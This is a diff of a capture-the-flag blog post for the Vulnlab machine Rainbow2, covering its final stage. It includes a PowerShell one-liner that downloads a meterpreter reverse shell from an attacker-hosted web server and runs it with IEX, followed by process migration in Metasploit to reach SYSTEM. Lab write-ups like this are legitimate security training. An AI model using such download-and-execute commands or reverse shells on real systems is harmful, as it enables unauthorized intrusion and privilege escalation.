dplastico/dplastico.github.io/_posts/2023-07-02-2023-write_up-Rainbow2-(Vulnlab).md

 ```
 We can observe we have a high-integrity shell, and we are part of NT AUTHORITY.
 So after all that ropping, I went the easy way and first called a PowerShell reverse_shell and generate a 32-bit meterpreter shell  (remember, we are running on an x86 process).

-We then can host the shell in a Python web server and execute PowerShell in our shell and download and execute the meterpreter reverse shell with the followign command
+Next, let's host the reverse shell in a Python web server. and execute PowerShell to download and execute the meterpreter reverse shell with the followign command.

 ```
 (new-object system.net.webclient).DownloadString('http://10.8.0.138/dplashell.txt') | IEX
 ```
-Now we got a meterpreter session.
+We got a meterpreter session.

 ![](https://github.com/dplastico/dplastico.github.io/raw/main/_posts/img/2023-07-02-19-40-40.png)

-Getting SYSTEM is now trivial.
-We can just migrate to a SYSTEM process, like the _spoolsv_ process, and use the __migrate__ command in Metasploit to accomplish this.
+Elevating privileges is now trivial.
+Migrating to a SYSTEM process, like the _spoolsv_ process, and use the __migrate__ command in Metasploit we'll be enough to accomplish this.

 ![](https://github.com/dplastico/dplastico.github.io/raw/main/_posts/img/2023-07-02-19-44-42.png)

 We are now SYSTEM!!
-After some root-dance we can read the root.txt.
+And after some root-dance we can read the root.txt.

 ![](https://github.com/dplastico/dplastico.github.io/raw/main/_posts/img/2023-07-02-19-47-29.png)